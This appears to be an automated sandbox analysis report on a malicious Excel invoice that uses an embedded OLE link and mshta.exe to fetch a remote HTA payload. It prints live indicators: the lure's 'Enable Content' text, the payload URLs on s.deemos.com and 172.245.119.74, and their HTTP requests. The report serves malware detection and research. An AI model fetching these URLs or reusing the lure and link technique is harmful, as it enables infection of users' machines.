Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Invoice#T5O2025.xls

Overview

General Information

Sample name:Invoice#T5O2025.xls
Analysis ID:1592495
MD5:672c67954a3bfbd5cd55c71d59d5b6cf
SHA1:2568553e9931dea57a5d27239b406319a8ca1c6a
SHA256:11cef9a224722a7d5726188155d3c6ccd2a206a49ce9121e338a843617856b75
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 2496 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7364 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 7480 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 7784 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Invoice#T5O2025.xls" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 2496, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7364, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2496, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49849
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49849, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2496, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Invoice#T5O2025.xlsAvira: detected
Source: Invoice#T5O2025.xlsVirustotal: Detection: 24%Perma Link
Source: Invoice#T5O2025.xlsReversingLabs: Detection: 39%
Source: Invoice#T5O2025.xlsJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.4:49849 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49849
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49849
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49849
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49849
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49849
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49849
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49849
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49849
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49849
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49849 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49849
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.4:49865
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.4:49865 -> 172.245.119.74:80
Source: excel.exeMemory has grown: Private usage: 2MB later: 98MB
Source: Joe Sandbox ViewIP Address: 14.103.79.10 14.103.79.10
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /fNsCo8xA?&priesthood=tame&quotation=pretty&mall HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/ssw/reallynicegirlwithniceattitudegirlfriends.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: global trafficHTTP traffic detected: GET /fNsCo8xA?&priesthood=tame&quotation=pretty&mall HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/ssw/reallynicegirlwithniceattitudegirlfriends.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.119.74
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: Invoice#T5O2025.xls, 18040000.0.drString found in binary or memory: https://s.deemos.com/fNsCo8xA?&priesthood=tame&quotation=pretty&mall
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.4:49849 version: TLS 1.2

System Summary

barindex
Source: screenshotOCR: document is protected Open the dcxument in If this document was @!bi#d\e: @ the yellow bar above O
Source: screenshotOCR: protected documents Sheet2 Sheet3 CURCNK Ready & Accessibility: Unavailable JSDNGYCO... NEBFCQY... B
Source: screenshotOCR: Enable Content" from the yellow bar above protected documents Sheet2 Sheet3 CURCNK Ready & Accessibi
Source: screenshotOCR: document is protected Open the dcxument in If this document was @ltva1bZ protected documents @bi#d%
Source: screenshotOCR: protected documents @bi#d%: @ the yellow bar above Once you have enabled editing please click -Ena
Source: screenshotOCR: Enable Content" from the yellow bar above 1 : Above price is ba sed on EXW China, not included any s
Source: screenshotOCR: document is protected Open the dcxument in If this document was @ltva1bZ protected documents @bi#d%
Source: screenshotOCR: protected documents @bi#d%: @ the yellow bar above Once you have enabled editing please click -Ena
Source: screenshotOCR: Enable Content" from the yellow bar above 1 : Above price is ba sed on EXW China, not included any s
Source: screenshotOCR: document is protected Keep an eye on it Anch We will keep track of accessibility issues while you wo
Source: screenshotOCR: Enable Content" from Loading Loading completed Final calculation started Final calculation ended Car
Source: screenshotOCR: document is protected Open the document in Microsoft Office. previewing online is not available for
Source: screenshotOCR: Enable Content" from Sheetl Sheet2 Sheet3 cargo a Ready Accessibility: Investigate Loading Loading c
Source: screenshotOCR: document is protected If this dcxument was the yellow bar Once you have 3 ting. please click -Enable
Source: screenshotOCR: Enable Content- from the yellow bar above MT : 05, 30 M /7,3 M : 5,6 M M 16.w LT 12/7/224 12/
Source: Invoice#T5O2025.xlsOLE: Microsoft Excel 2007+
Source: Invoice#T5O2025.xlsOLE: Microsoft Excel 2007+
Source: Invoice#T5O2025.xlsOLE: Microsoft Excel 2007+
Source: 18040000.0.drOLE: Microsoft Excel 2007+
Source: 18040000.0.drOLE: Microsoft Excel 2007+
Source: Invoice#T5O2025.xlsOLE indicator, VBA macros: true
Source: Invoice#T5O2025.xlsStream path 'MBD0081AAFB/\x1Ole' : https://s.deemos.com/fNsCo8xA?&priesthood=tame&quotation=pretty&mall]~kc pX+}i!:n.Z3BdFffT8GSpS8RvFfW5cPG1Ccb4GfFsCwjHyGTE41L2mFP1Gu5aXB4ZfKpZzluRDeq7m1A3lMsc7vnNs2R7E0RxCOhSsPMCEOSm4UYI38PrD36kTtlrpPfZip3EpuuI4UcLg2CDtSYXxFHiCL0jeXQZypuutAGmIWR9fb33rWbwatoqsZLkT9x8PYFqPiiaC6wFAodpHg6dkdlTLlpa8l7EKQ3sArzdpFNlzz6QLRcUxJf52PeDxw.shLsljH7Q&1EcJ
Source: 18040000.0.drStream path 'MBD0081AAFB/\x1Ole' : https://s.deemos.com/fNsCo8xA?&priesthood=tame&quotation=pretty&mall]~kc pX+}i!:n.Z3BdFffT8GSpS8RvFfW5cPG1Ccb4GfFsCwjHyGTE41L2mFP1Gu5aXB4ZfKpZzluRDeq7m1A3lMsc7vnNs2R7E0RxCOhSsPMCEOSm4UYI38PrD36kTtlrpPfZip3EpuuI4UcLg2CDtSYXxFHiCL0jeXQZypuutAGmIWR9fb33rWbwatoqsZLkT9x8PYFqPiiaC6wFAodpHg6dkdlTLlpa8l7EKQ3sArzdpFNlzz6QLRcUxJf52PeDxw.shLsljH7Q&1EcJ
Source: ~DF3A8EE2EC90F693B8.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal80.expl.winXLS@6/9@1/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\18040000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{B76471F3-C247-4355-B538-F9AB0D871BCE} - OProcSessId.datJump to behavior
Source: Invoice#T5O2025.xlsOLE indicator, Workbook stream: true
Source: 18040000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Invoice#T5O2025.xlsVirustotal: Detection: 24%
Source: Invoice#T5O2025.xlsReversingLabs: Detection: 39%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Invoice#T5O2025.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
